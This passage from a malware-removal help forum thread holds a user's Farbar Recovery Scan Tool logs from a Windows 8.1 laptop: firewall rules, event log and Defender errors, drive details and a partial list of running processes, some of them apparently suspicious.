FirewallRules: [{FBB98ABC-9569-4C9B-ACD7-72394C22E85A}] => (Allow) C:\Users\Dan\AppData\Local\Temp\nsqF114.tmp\CnetInstaller-10444774.exe
FirewallRules: [{7D2A9822-B4AC-4027-8630-BBA86B2B3250}] => (Allow) C:\Users\Dan\AppData\Local\Temp\nsnD7EB.tmp\CnetInstaller-75449917.exe
FirewallRules: [{B61AADD3-2D37-49CE-8846-3DBE50FB4B8A}] => (Allow) C:\Users\Dan\AppData\Local\Temp\nsnD7EB.tmp\CnetInstaller-75449917.exe
FirewallRules: [{2DA2B986-7667-4D2C-9E85-C2F81B954DE6}] => (Allow) C:\Users\Dan\AppData\Local\Temp\nsw2542.tmp\CnetInstaller-10875190.exe
FirewallRules: [{2FE73EE5-6FB3-4DC8-9CFF-B1AD59033BDD}] => (Allow) C:\Users\Dan\AppData\Local\Temp\nsw2542.tmp\CnetInstaller-10875190.exe
FirewallRules: [TCP Query User{5AC03A41-337A-4D35-8475-DBF7FCF3718C}C:\program file (x86) vlc media player videolan\vlc\vlc.exe] => (Block) C:\program file (x86) vlc media player videolan\vlc\vlc.exe
FirewallRules: [UDP Query User{3A9F9831-57E1-4FDB-984D-672AA8256557}C:\program file (x86) vlc media player videolan\vlc\vlc.exe] => (Block) C:\program file (x86) vlc media player videolan\vlc\vlc.exe
FirewallRules: [{57579DAD-B0A7-4600-BACB-ACFBD0BF582E}] => (Allow) C:\Program File (x86) 4kYoutubetomp3TWO\DVDVideoSoft\Free Torrent Download\FreeTorrentDownload.exe
FirewallRules: [{20046B7C-7FC0-4DAC-81CD-B157DC013E33}] => (Allow) C:\Program File (x86) 4kYoutubetomp3TWO\DVDVideoSoft\Free Torrent Download\FreeTorrentDownload.exe
FirewallRules: [TCP Query User{210A33E9-6B2B-44CF-BCF6-D34BC763A901}C:\program file (x86) dvdsoft two - free studio package\dvdvideosoft\free torrent download\freetorrentdownload.exe] => (Allow) C:\program file (x86) dvdsoft two - free studio package\dvdvideosoft\free torrent download\freetorrentdownload.exe
FirewallRules: [UDP Query User{BC1DE14B-4640-475C-A83B-879941C715F5}C:\program file (x86) dvdsoft two - free studio package\dvdvideosoft\free torrent download\freetorrentdownload.exe] => (Allow) C:\program file (x86) dvdsoft two - free studio package\dvdvideosoft\free torrent download\freetorrentdownload.exe
FirewallRules: [{207663F4-14AA-4B8C-8B75-0E34AECA606F}] => (Block) C:\program file (x86) dvdsoft two - free studio package\dvdvideosoft\free torrent download\freetorrentdownload.exe
FirewallRules: [{5F89233A-ABDC-4FF1-9263-2D96AFE62121}] => (Block) C:\program file (x86) dvdsoft two - free studio package\dvdvideosoft\free torrent download\freetorrentdownload.exe
FirewallRules: [TCP Query User{803AE086-7E6A-48E0-8802-785AA4FC4A01}C:\program file (x86) frostwire 6 - torrent & music downloader\frostwire 6\frostwire.exe] => (Allow) C:\program file (x86) frostwire 6 - torrent & music downloader\frostwire 6\frostwire.exe
FirewallRules: [UDP Query User{DD0732C4-EE26-4E6D-9566-D42C50E770DC}C:\program file (x86) frostwire 6 - torrent & music downloader\frostwire 6\frostwire.exe] => (Allow) C:\program file (x86) frostwire 6 - torrent & music downloader\frostwire 6\frostwire.exe
FirewallRules: [{92D3E127-A9C9-4A57-A4DE-C37C30EEC069}] => (Allow) C:\Program File (x86) ApowerSoft Video Download Capture\Video Download Capture\Video Download Capture.exe
FirewallRules: [{6D97C59F-C2D5-4B5F-A2EB-62DED9A63774}] => (Allow) C:\Program File (x86) ApowerSoft Video Download Capture\Video Download Capture\Video Download Capture.exe
FirewallRules: [{595BE6ED-4AE7-4E50-8492-81EF52DC503B}] => (Allow) C:\Program File (x86) ApowerSoft Video Download Capture\Video Download Capture\ApowersoftSrv.dll
FirewallRules: [{51406614-36DB-4932-854C-7354C320CCCE}] => (Allow) C:\Program File (x86) ApowerSoft Video Download Capture\Video Download Capture\ApowersoftSrv.dll
FirewallRules: [{0FD1A6F0-6892-4528-8D02-6DA308CE78B8}] => (Allow) C:\Program File (x86) ApowerSoft Video Download Capture\Video Download Capture\ApowersoftDump.dll
FirewallRules: [{F5C52100-551E-41EB-9F6B-22785A10B72E}] => (Allow) C:\Program File (x86) ApowerSoft Video Download Capture\Video Download Capture\ApowersoftDump.dll
FirewallRules: [{F90CFC89-D1E5-47FE-810D-4C2A003E3EC4}] => (Allow) C:\Program File (x86) ApowerSoft Video Download Capture\Video Download Capture\ApowersoftAC.dll
FirewallRules: [{B4D1EF72-3517-40C5-A216-D67E59703BD4}] => (Allow) C:\Program File (x86) ApowerSoft Video Download Capture\Video Download Capture\ApowersoftAC.dll
FirewallRules: [{95D8704A-2EE2-4ABF-A286-E107F9FE797F}] => (Allow) C:\Program File (x86) ApowerSoft Video Download Capture\Video Download Capture\ApowersoftPlayer.dll
FirewallRules: [{4819C0F7-D28C-465D-9F1B-E02D925E86AE}] => (Allow) C:\Program File (x86) ApowerSoft Video Download Capture\Video Download Capture\ApowersoftPlayer.dll
FirewallRules: [{FC9BC8BE-3785-41F0-9673-77798F53F411}] => (Allow) C:\Program File (x86) ApowerSoft Video Download Capture\Video Download Capture\ApowersoftDownloaderHelp.dll
FirewallRules: [{97D423F4-0FDF-4C9C-9062-3118615A659E}] => (Allow) C:\Program File (x86) ApowerSoft Video Download Capture\Video Download Capture\ApowersoftDownloaderHelp.dll
FirewallRules: [{F3617F33-975E-49A1-82F7-525FC3550128}] => (Allow) C:\Program File (x86) ApowerSoft Video Download Capture\Video Download Capture\ApowersoftHDSDump.dll
FirewallRules: [{A279D673-8345-423B-A713-D33AE6388178}] => (Allow) C:\Program File (x86) ApowerSoft Video Download Capture\Video Download Capture\ApowersoftHDSDump.dll
FirewallRules: [{2AC43D62-7AC9-47C0-9BAF-E92B1B7BBA30}] => (Allow) C:\Users\Dan\AppData\Local\Temp\Andy_45.5_x64\Setup.exe
FirewallRules: [{C12F076D-5E2B-450E-91A2-3D08D18E1937}] => (Allow) C:\Users\Dan\AppData\Local\Temp\Andy_45.5_x64\Setup.exe
FirewallRules: [{3D3CF842-8298-442A-B9C9-A5399B012E71}] => (Allow) C:\Program Files\Andy\andy.exe
FirewallRules: [{C31226E6-F861-4DEA-B2FD-2634BE6F0129}] => (Allow) C:\Program Files\Andy\andy.exe
FirewallRules: [{D12533D4-1609-4FAF-85BD-3A23601A19D7}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{C02EE326-2CB8-4B8B-85EE-B9EF5101D2FC}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{E6F43DE1-5773-4F5C-997C-8F9A152B8CC6}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{4A1A6E79-2801-44AC-93C6-A5698676BF58}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{447CC466-EC34-4DCC-9474-38A417083D49}] => (Allow) C:\Program Files (x86)\VMware\VMware Player\vmware-authd.exe
FirewallRules: [{B6E8D305-52B5-45E2-8C5A-2EE37A8ADB44}] => (Allow) C:\Program Files (x86)\VMware\VMware Player\vmware-authd.exe
FirewallRules: [{0649CB28-67B5-48B4-B97E-CDA231670A45}] => (Allow) C:\Program Files\Andy\HandyAndy.exe
FirewallRules: [{5BAD7087-DE25-4030-A16A-578CD107BD81}] => (Allow) C:\Program Files\Andy\HandyAndy.exe
FirewallRules: [{BF1E40F5-A2D7-4946-895B-E0067521547F}] => (Allow) C:\Program File (x86) WINAMP Radio & Music Player Browser - NEW Ver\Winamp\winamp.exe
FirewallRules: [{17ED7A00-1D80-4074-B1AB-25880A7BB6B6}] => (Allow) C:\Program File (x86) WINAMP Radio & Music Player Browser - NEW Ver\Winamp\winamp.exe
FirewallRules: [TCP Query User{396BBCA8-02CB-4338-8B42-915ECADCD922}C:\program file (x86) presonus studio one 2 free multitrack recorder\program file (x86) presonus studio one 2 multitrack recorder free\studio one 2\studio one.exe] => (Allow) C:\program file (x86) presonus studio one 2 free multitrack recorder\program file (x86) presonus studio one 2 multitrack recorder free\studio one 2\studio one.exe
FirewallRules: [UDP Query User{73E87333-E910-4EEC-804C-17612FDD0764}C:\program file (x86) presonus studio one 2 free multitrack recorder\program file (x86) presonus studio one 2 multitrack recorder free\studio one 2\studio one.exe] => (Allow) C:\program file (x86) presonus studio one 2 free multitrack recorder\program file (x86) presonus studio one 2 multitrack recorder free\studio one 2\studio one.exe
FirewallRules: [{9E3E9781-622A-4CDF-A7EF-F851961BEA19}] => (Allow) C:\Program Files (x86)\Common Files\Apple\Apple Application Support\WebKit2WebProcess.exe
FirewallRules: [{7C52A72D-17FC-484E-A819-81F527082F0F}] => (Allow) C:\Program File (x86) Davinci 12.5 Beta Video Edting Software\Resolve.exe
FirewallRules: [{5B94E67F-A6E7-4C37-B249-3CED37E49F0D}] => (Allow) C:\Program File (x86) Davinci 12.5 Beta Video Edting Software\bmdpaneld.exe
FirewallRules: [{BA3F2295-A446-4372-A933-C67E6917CAA9}] => (Allow) C:\Program File (x86) Davinci 12.5 Beta Video Edting Software\JLCooperPanelDaemon.exe
FirewallRules: [{AF2811BE-4318-4F7F-8F60-8E10AD92B8F2}] => (Allow) C:\Program File (x86) Davinci 12.5 Beta Video Edting Software\EuphonixPanelDaemon.exe
FirewallRules: [{9D04EBDE-0FDE-4918-94E4-D40C3C002C6F}] => (Allow) C:\Program File (x86) Davinci 12.5 Beta Video Edting Software\TangentPanelDaemon.exe
FirewallRules: [{BDA720FB-BED0-4342-84C3-1AF5017ECCAA}] => (Allow) C:\Program File (x86) Davinci 12.5 Beta Video Edting Software\ElementsPanelDaemon.exe
FirewallRules: [{56DE631C-A030-4DF6-B707-2D24656517FF}] => (Allow) C:\Program File (x86) Davinci 12.5 Beta Video Edting Software\DPDecoder.exe
FirewallRules: [{B0D56FFA-C1C5-488E-B442-2038AC05A5A6}] => (Allow) C:\ProgramData\Blackmagic Design\DaVinci Resolve\Support\QtDecoder\QTDecoder.exe
FirewallRules: [TCP Query User{80D1B33D-1849-4BEE-B7BB-78C9D2D3F544}C:\program file (x86) davinci 12.5 beta video edting software\dpdecoder.exe] => (Block) C:\program file (x86) davinci 12.5 beta video edting software\dpdecoder.exe
FirewallRules: [UDP Query User{B40DADB6-9E25-4951-B741-8458BE0396EE}C:\program file (x86) davinci 12.5 beta video edting software\dpdecoder.exe] => (Block) C:\program file (x86) davinci 12.5 beta video edting software\dpdecoder.exe
FirewallRules: [{9B19D861-CA78-446B-AD40-2E9AA11FDFB5}] => (Allow) C:\Program File (x86) VSDC Video Editor - Free\FlashIntegro\VideoEditor\VideoEditor.exe
FirewallRules: [{9A1FF358-15BA-4495-8972-7D4A585582FE}] => (Allow) C:\Program File (x86) VSDC Video Editor - Free\FlashIntegro\VideoEditor\VideoEditor.exe
FirewallRules: [{DFD16930-C6D4-42A7-8594-A07EAE59D209}] => (Allow) C:\Program File (x86) VSDC Video Editor - Free\FlashIntegro\VideoEditor\Updater.exe
FirewallRules: [{96FED481-82D0-450B-85C3-36735EB1549F}] => (Allow) C:\Program File (x86) VSDC Video Editor - Free\FlashIntegro\VideoEditor\Updater.exe
FirewallRules: [{17F50D30-FD50-46D0-BEE3-81847CF40C64}] => (Allow) C:\Program Files (x86)\windfind\windfind.exe
FirewallRules: [{96606CA1-E101-4434-AE0C-6C99B774D1CA}] => (Allow) C:\Program Files (x86)\windfind\windfind_.exe
FirewallRules: [{D61EF620-8F0B-40A6-9BB7-E836DA310B7C}] => (Block) %SystemDrive%\Program File (x86) Adobe Premiere Pro CC - 2 - (Program)\Adobe Premiere Pro CC 2015\Adobe Premiere Pro.exe
FirewallRules: [{91606396-6288-43E6-AE6F-EEB421C75181}] => (Block) %SystemDrive%\Program File (x86) Adobe Premiere Pro CC - 2 - (Program)\Adobe Premiere Pro CC 2015\Adobe Premiere Pro.exe
FirewallRules: [{807550B5-7265-4327-9B16-266D34A7742C}] => (Block) %SystemDrive%\Program File (x86) Adobe After Effects CS6 - Video EfXs Program 2\Adobe After Effects CC 2015.3\Support Files\AfterFX.exe
FirewallRules: [{EE7BB404-A2CF-4E23-A355-EA7C2D953145}] => (Block) %SystemDrive%\Program File (x86) Adobe After Effects CS6 - Video EfXs Program 2\Adobe After Effects CC 2015.3\Support Files\AfterFX.exe
FirewallRules: [{7C716CAC-0CA5-496D-B6B1-DBB04F82E573}] => (Block) %ProgramFiles%\Adobe\Adobe After Effects CC 2015.3\Support Files\AfterFX.exe
FirewallRules: [{047E31DF-A255-4F4C-9FE9-45DD54A3AB3B}] => (Block) %ProgramFiles%\Adobe\Adobe After Effects CC 2015.3\Support Files\AfterFX.exe
FirewallRules: [{B06B32BA-F38C-4C17-B422-99E7605B0063}] => (Block) %ProgramFiles%\Adobe\Adobe After Effects CC 2015.3\Support Files\AfterFX.exe
FirewallRules: [{E511541B-CD44-4376-A542-B6A6578FA8EE}] => (Block) %ProgramFiles%\Adobe\Adobe After Effects CC 2015.3\Support Files\AfterFX.exe
FirewallRules: [{068BAA54-B58F-43B6-8ADB-31E4DEE03ACC}] => (Block) %ProgramFiles%\Adobe\Adobe Media Encoder CC 2015.3\Adobe Media Encoder.exe
FirewallRules: [{B44756B4-DFCA-4CC9-953C-CCE8AE6CC11A}] => (Block) %ProgramFiles%\Adobe\Adobe Media Encoder CC 2015.3\Adobe Media Encoder.exe
FirewallRules: [{3C331E6B-E428-4D0C-BEA4-0FA06032B9D0}] => (Block) %ProgramFiles% (x86)\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe
FirewallRules: [{D450C4CE-50CA-4D6B-A47C-AF19379507B1}] => (Block) %ProgramFiles% (x86)\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe
FirewallRules: [{640DFB21-833E-420D-B80D-AC0DD899B614}] => (Allow) C:\Program Files (x86)\SrpnFiles\SrpnFiles.exe
FirewallRules: [{6CAA584E-EA21-4F97-9554-1E5312569977}] => (Allow) C:\Program Files (x86)\SrpnFiles\SrpnFiles.exe
FirewallRules: [{099E93F9-CFBA-4E6D-A852-0EFDF6E69C77}] => (Allow) C:\Program Files (x86)\SrpnFiles\downloader.exe
FirewallRules: [{10B74A86-9FC5-4D84-955B-4B2C2FAADC83}] => (Allow) C:\Program Files (x86)\SrpnFiles\downloader.exe
FirewallRules: [{65FA2FF6-971C-44E8-8D5E-C565539E0181}] => (Block) %SystemDrive%\Program File (x86) CrazyTalk Animator 2 Pipeline 8.03.1620.1 + Crack [SadeemPC]\CrazyTalk Animator 2\CrazyTalk Animator 2\CrazyTalkAnimator.exe
FirewallRules: [{88078A39-6DBF-4310-9720-BC7A9811094B}] => (Block) %SystemDrive%\Program File (x86) CrazyTalk Animator 2 Pipeline 8.03.1620.1 + Crack [SadeemPC]\CrazyTalk Animator 2\CrazyTalk Animator 2\CrazyTalkAnimator.exe
FirewallRules: [{5D12474E-76BE-4D8A-8BD7-4CECA0F32CFB}] => (Allow) C:\Users\Dan\AppData\Local\Kometa\Application\kometa.exe
FirewallRules: [{814CAEF2-ADD6-4507-BAE2-55F6820A7994}] => (Allow) C:\Program Files (x86)\Genericshaili\Genericshaili.exe
FirewallRules: [{0E3753F1-E381-437A-BC70-0B47ECA113FA}] => (Allow) C:\Program Files (x86)\Genericshaili\Genericshaili_.exe
FirewallRules: [{8269955E-0B8F-464C-B326-2023E770CABC}] => (Allow) C:\Program Files (x86)\Henwood\fontenot.exe
FirewallRules: [{3606180A-FA39-4B14-88F6-E879C8BB4B0B}] => (Allow) C:\Program Files (x86)\Police\fontenot.exe
FirewallRules: [{99FAD6CC-61D4-4806-B204-7F3641DDD7F3}] => (Block) %ProgramFiles% (x86)\FaceGen\Artist Pro\fgArtistPro.exe
FirewallRules: [{6CCE0F5A-ED5B-48E9-898C-B3168715BED1}] => (Block) %ProgramFiles% (x86)\FaceGen\Artist Pro\fgArtistPro.exe
FirewallRules: [TCP Query User{9536F0CC-5E66-46E8-805B-67D9697C530F}C:\program files (x86)\skype\phone\skype.exe] => (Allow) C:\program files (x86)\skype\phone\skype.exe
FirewallRules: [UDP Query User{C5258519-221C-4A37-A687-51526258F672}C:\program files (x86)\skype\phone\skype.exe] => (Allow) C:\program files (x86)\skype\phone\skype.exe
FirewallRules: [{5507329C-601E-4572-9AD8-6C16774E1ADC}] => (Allow) C:\Program File (x86) Firefox Web Browser Mozilla\firefox.exe
FirewallRules: [{187A8271-92D7-449D-8643-56ECD2671F9C}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{C260D9CD-8DD2-4B5A-8BDE-C4CFD01C9F25}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [TCP Query User{DB1E8DAE-0016-43D8-BB69-DC8005FC9089}C:\program files (x86)\mozilla firefox\firefox.exe] => (Block) C:\program files (x86)\mozilla firefox\firefox.exe
FirewallRules: [UDP Query User{EA5A15E3-2AE2-47A4-AB76-6A52AAB47F97}C:\program files (x86)\mozilla firefox\firefox.exe] => (Block) C:\program files (x86)\mozilla firefox\firefox.exe
FirewallRules: [{31F2912A-119F-44BD-A9EB-53A4D506D23B}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

==================== Restore Points =========================

ATTENTION: System Restore is disabled

==================== Faulty Device Manager Devices =============

Name:
Description:
Class Guid:
Manufacturer:
Service:
Problem: : The drivers for this device are not installed. (Code 28)
Resolution: To install the drivers for this device, click "Update Driver", which starts the Hardware Update wizard.


==================== Event log errors: =========================

Application errors:
==================
Error: (05/31/2018 08:51:33 PM) (Source: Software Protection Platform Service) (EventID: 16385) (User: )
Description: Failed to schedule Software Protection service for re-start at 2118-05-08T00:51:33Z. Error Code: 0x80070020.

Error: (05/31/2018 08:51:03 PM) (Source: Software Protection Platform Service) (EventID: 16385) (User: )
Description: Failed to schedule Software Protection service for re-start at 2118-05-08T00:51:03Z. Error Code: 0x80070020.

Error: (05/31/2018 08:50:33 PM) (Source: Software Protection Platform Service) (EventID: 16385) (User: )
Description: Failed to schedule Software Protection service for re-start at 2118-05-08T00:50:33Z. Error Code: 0x80070020.

Error: (05/31/2018 08:50:03 PM) (Source: Software Protection Platform Service) (EventID: 16385) (User: )
Description: Failed to schedule Software Protection service for re-start at 2118-05-08T00:50:02Z. Error Code: 0x80070020.

Error: (05/31/2018 08:49:32 PM) (Source: Software Protection Platform Service) (EventID: 16385) (User: )
Description: Failed to schedule Software Protection service for re-start at 2118-05-08T00:49:32Z. Error Code: 0x80070020.

Error: (05/31/2018 08:49:02 PM) (Source: Software Protection Platform Service) (EventID: 16385) (User: )
Description: Failed to schedule Software Protection service for re-start at 2118-05-08T00:49:02Z. Error Code: 0x80070020.

Error: (05/31/2018 08:48:32 PM) (Source: Software Protection Platform Service) (EventID: 16385) (User: )
Description: Failed to schedule Software Protection service for re-start at 2118-05-08T00:48:32Z. Error Code: 0x80070020.

Error: (05/31/2018 08:48:02 PM) (Source: Software Protection Platform Service) (EventID: 16385) (User: )
Description: Failed to schedule Software Protection service for re-start at 2118-05-08T00:48:02Z. Error Code: 0x80070020.


System errors:
=============
Error: (05/31/2018 08:39:15 PM) (Source: disk) (EventID: 11) (User: )
Description: The driver detected a controller error on \Device\Harddisk0\DR0.

Error: (05/31/2018 08:39:15 PM) (Source: disk) (EventID: 11) (User: )
Description: The driver detected a controller error on \Device\Harddisk0\DR0.

Error: (05/31/2018 08:39:15 PM) (Source: disk) (EventID: 11) (User: )
Description: The driver detected a controller error on \Device\Harddisk0\DR0.

Error: (05/31/2018 08:39:15 PM) (Source: disk) (EventID: 11) (User: )
Description: The driver detected a controller error on \Device\Harddisk0\DR0.

Error: (05/31/2018 08:39:15 PM) (Source: disk) (EventID: 11) (User: )
Description: The driver detected a controller error on \Device\Harddisk0\DR0.

Error: (05/31/2018 08:39:11 PM) (Source: disk) (EventID: 11) (User: )
Description: The driver detected a controller error on \Device\Harddisk0\DR0.

Error: (05/31/2018 08:39:11 PM) (Source: disk) (EventID: 11) (User: )
Description: The driver detected a controller error on \Device\Harddisk0\DR0.

Error: (05/31/2018 08:39:11 PM) (Source: disk) (EventID: 11) (User: )
Description: The driver detected a controller error on \Device\Harddisk0\DR0.


Windows Defender:
===================================
Date: 2015-02-02 09:49:52.792
Description:
Windows Defender scan has been stopped before completion.
Scan ID: {4BF9AF7B-A43D-4E64-B277-DEFB56CDC0E3}
Scan Type: Antimalware
Scan Parameters: Quick Scan

Date: 2015-02-02 08:06:18.260
Description:
Windows Defender scan has been stopped before completion.
Scan ID: {16FD4F1F-550C-4A26-9400-0412629CFD5A}
Scan Type: Antimalware
Scan Parameters: Quick Scan

Date: 2015-02-01 10:17:58.118
Description:
Windows Defender scan has been stopped before completion.
Scan ID: {BADC4EF7-6BAD-444C-AB05-92085B6CF93D}
Scan Type: Antimalware
Scan Parameters: Quick Scan

Date: 2015-02-01 08:23:26.263
Description:
Windows Defender scan has been stopped before completion.
Scan ID: {C9B87AF6-96B3-4644-9422-EB0CED28391C}
Scan Type: Antimalware
Scan Parameters: Quick Scan

Date: 2015-01-31 08:30:36.872
Description:
Windows Defender scan has been stopped before completion.
Scan ID: {4D8C80CB-F50C-47EE-94E8-DC02EC0EE056}
Scan Type: Antimalware
Scan Parameters: Quick Scan

Date: 2015-02-01 05:57:28.954
Description:
Windows Defender has encountered an error trying to update signatures.
New Signature Version:
Previous Signature Version: 110.6.0.0
Update Source: Microsoft Malware Protection Center
Signature Type: Network Inspection System
Update Type: Full
Current Engine Version:
Previous Engine Version: 2.1.10302.0
Error code: 0x80072ee7
Error description: The server name or address could not be resolved

Date: 2015-02-01 05:57:28.938
Description:
Windows Defender has encountered an error trying to update signatures.
New Signature Version:
Previous Signature Version: 1.167.387.0
Update Source: Microsoft Malware Protection Center
Signature Type: AntiSpyware
Update Type: Full
Current Engine Version:
Previous Engine Version: 1.1.10302.0
Error code: 0x80072ee7
Error description: The server name or address could not be resolved

Date: 2015-02-01 05:57:28.938
Description:
Windows Defender has encountered an error trying to update signatures.
New Signature Version:
Previous Signature Version: 1.167.387.0
Update Source: Microsoft Malware Protection Center
Signature Type: AntiVirus
Update Type: Full
Current Engine Version:
Previous Engine Version: 1.1.10302.0
Error code: 0x80072ee7
Error description: The server name or address could not be resolved

Date: 2015-02-01 05:57:28.844
Description:
Windows Defender has encountered an error trying to update signatures.
New Signature Version:
Previous Signature Version: 1.167.387.0
Update Source: Microsoft Update Server
Signature Type: AntiVirus
Update Type: Full
Current Engine Version:
Previous Engine Version: 1.1.10302.0
Error code: 0x8024402c
Error description: An unexpected problem occurred while checking for updates. For information on installing or troubleshooting updates, see Help and Support.

Date: 2015-01-30 05:22:07.607
Description:
Windows Defender has encountered an error trying to update signatures.
New Signature Version:
Previous Signature Version: 110.6.0.0
Update Source: Microsoft Malware Protection Center
Signature Type: Network Inspection System
Update Type: Full
Current Engine Version:
Previous Engine Version: 2.1.10302.0
Error code: 0x80072ee7
Error description: The server name or address could not be resolved

CodeIntegrity:
===================================

Date: 2018-05-31 20:26:36.690
Description:
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2018-05-30 20:23:16.216
Description:
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2018-05-29 20:18:30.477
Description:
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2018-05-28 20:19:31.437
Description:
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2018-05-27 20:15:46.268
Description:
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2018-05-26 19:41:39.042
Description:
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2018-05-25 20:17:17.572
Description:
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2018-05-24 20:18:24.997
Description:
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

==================== Memory info ===========================

Processor: Intel® Celeron® CPU N2830 @ 2.16GHz
Percentage of memory in use: 48%
Total physical RAM: 3982.68 MB
Available physical RAM: 2066.01 MB
Total Virtual: 4686.68 MB
Available Virtual: 2804.26 MB

==================== Drives ================================

Drive c: (OS) (Fixed) (Total:444.65 GB) (Free:149.08 GB) NTFS ==>[system with boot components (obtained from drive)]
Drive d: () (Removable) (Total:7.45 GB) (Free:3.35 GB) FAT32

\\?\Volume{3e80ab0f-bf50-4f22-8c02-3c22ee1a6bb4}\ (Recovery) (Fixed) (Total:0.88 GB) (Free:0.59 GB) NTFS
\\?\Volume{436d9e19-7fb5-4350-864c-86573ec335b2}\ () (Fixed) (Total:0 GB) (Free:0 GB)

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (Size: 465.8 GB) (Disk ID: 3F7852A4)

Partition: GPT.

========================================================
Disk: 1 (Protective MBR) (Size: 7.5 GB) (Disk ID: 00000000)

Partition: GPT.

==================== End of.txt ============================

Edited by Oh My!, 02 June 2018 - 07:59 AM.


#7 danban

Posted 01 June 2018 - 11:24 AM

Here's the FRST txt


Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 16.05.2018 01
Ran by Dan (administrator) on BEATLES (31-05-2018 20:48:33)
Running from C:\Users\Dan\Desktop
Loaded Profiles: Dan (Available Profiles: Dan)
Platform: Windows 8.1 Connected (Update) (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: IE)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(TOSHIBA CORPORATION) C:\Windows\System32\avmhengsvc.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Microsoft Corporation) C:\Windows\SysWOW64\rundll32.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe
(Adobe Systems, Incorporated) C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe
(ASUS Cloud Corporation) C:\Program Files (x86)\ASUS\WebStorage\2.1.2.301\AsusWSWinService.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(ASUSTeK Computer Inc.) C:\Program Files (x86)\ASUS\Splendid\ColorUService.exe
(ASUS) C:\Program Files (x86)\ASUS\Splendid\ACMON.exe
() C:\ProgramData\dahhService\dahhService.exe
() C:\Program Files\Gramblr\gramblr.exe
(Intel® Corporation) C:\Program Files\Intel\TXE Components\TCS\HeciServer.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(www.shadowexplorer.com) C:\Program File (x86) ShadowExplorer\ShadowExplorer\sesvc.exe
(VMware, Inc.) C:\Windows\SysWOW64\vmnat.exe
() C:\Users\Dan\AppData\Local\aucozre\aucozre.exe
() C:\Users\Dan\AppData\Local\aucozre\nvhuamg.exe
() C:\Users\Dan\AppData\Local\aucozre\nvhuamg.exe
(AsusTek) C:\Program Files (x86)\ASUS\ASUS Smart Gesture\AsTPCenter\x64\AsusTPLoader.exe
(VMware, Inc.) C:\Program Files (x86)\VMware\VMware Player\vmware-authd.exe
(VMware, Inc.) C:\Windows\SysWOW64\vmnetdhcp.exe
(Intel Corporation) C:\Windows\System32\igfxtray.exe
(CyberLink Corp.) C:\Program Files (x86)\CyberLink\PowerDVD10\PDVD10Serv.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\IPC\AdobeIPCBroker.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ADS\Adobe Desktop Service.exe
() C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSync\CoreSync.exe
